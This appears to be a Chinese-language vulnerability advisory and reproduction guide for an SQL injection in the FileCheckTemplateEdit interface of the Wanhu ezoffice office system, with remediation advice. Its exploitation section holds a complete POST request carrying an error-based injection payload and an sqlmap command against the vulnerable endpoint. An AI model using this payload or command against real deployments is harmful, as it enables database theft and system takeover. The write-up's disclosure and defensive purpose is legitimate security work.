万户ezoffice FileCheckTemplateEdit SQL注入漏洞复现与分析

漏洞概述

本文详细分析万户ezoffice办公系统中的FileCheckTemplateEdit功能存在的SQL注入漏洞。该漏洞存在于文件模板编辑功能中，由于未对用户输入进行充分过滤，导致攻击者可以构造恶意SQL语句，获取数据库敏感信息。

漏洞影响版本

受影响版本：万户ezoffice特定版本（具体版本需根据实际测试确定）
漏洞类型：SQL注入
危险等级：高危

漏洞原理分析

漏洞位于文件模板编辑功能模块，具体为FileCheckTemplateEdit接口。该接口在处理用户提交的参数时，未进行充分的过滤和参数化查询处理，直接将用户输入拼接到SQL语句中执行。

漏洞复现步骤

1. 环境准备

• 搭建万户ezoffice测试环境
• 准备Burp Suite或其他抓包工具
• SQL注入测试工具（如sqlmap）

2. 漏洞验证

1. 登录系统并访问文件模板编辑功能
2. 拦截修改模板的请求数据包
3. 在相关参数中添加SQL注入测试payload

3. 利用过程

手动验证

构造如下请求（示例）：

POST /defaultroot/FileCheckTemplateEdit.action HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

templateId=1' AND 1=CONVERT(int,(SELECT CHAR(113)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (1=1) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)))--&templateName=test

观察响应，如果存在延时或特定字符返回，则证明存在SQL注入漏洞。

使用sqlmap自动化测试

sqlmap -u "http://target.com/defaultroot/FileCheckTemplateEdit.action" --data="templateId=1&templateName=test" --param="templateId" --level=5 --risk=3

4. 漏洞利用

成功利用该漏洞可以：

• 获取数据库中的敏感信息
• 执行管理员操作
• 获取系统shell（在某些配置下）

漏洞修复建议

1. 参数化查询：使用预编译语句和参数化查询替代字符串拼接
2. 输入验证：对用户输入的templateId等参数进行严格类型检查和过滤
3. 最小权限原则：数据库连接使用最小必要权限账户
4. WAF防护：部署Web应用防火墙拦截SQL注入攻击
5. 代码审计：对系统进行全面代码审计，查找类似问题

防御措施

1. 及时更新到官方最新版本
2. 对系统进行安全加固
3. 限制后台管理接口的访问权限
4. 启用数据库操作日志审计

总结

该SQL注入漏洞由于缺乏对用户输入的充分验证而导致，攻击者可以利用此漏洞获取系统敏感数据甚至控制系统。建议用户及时更新补丁或按照上述修复建议进行防护。

参考

FreeBuf原文链接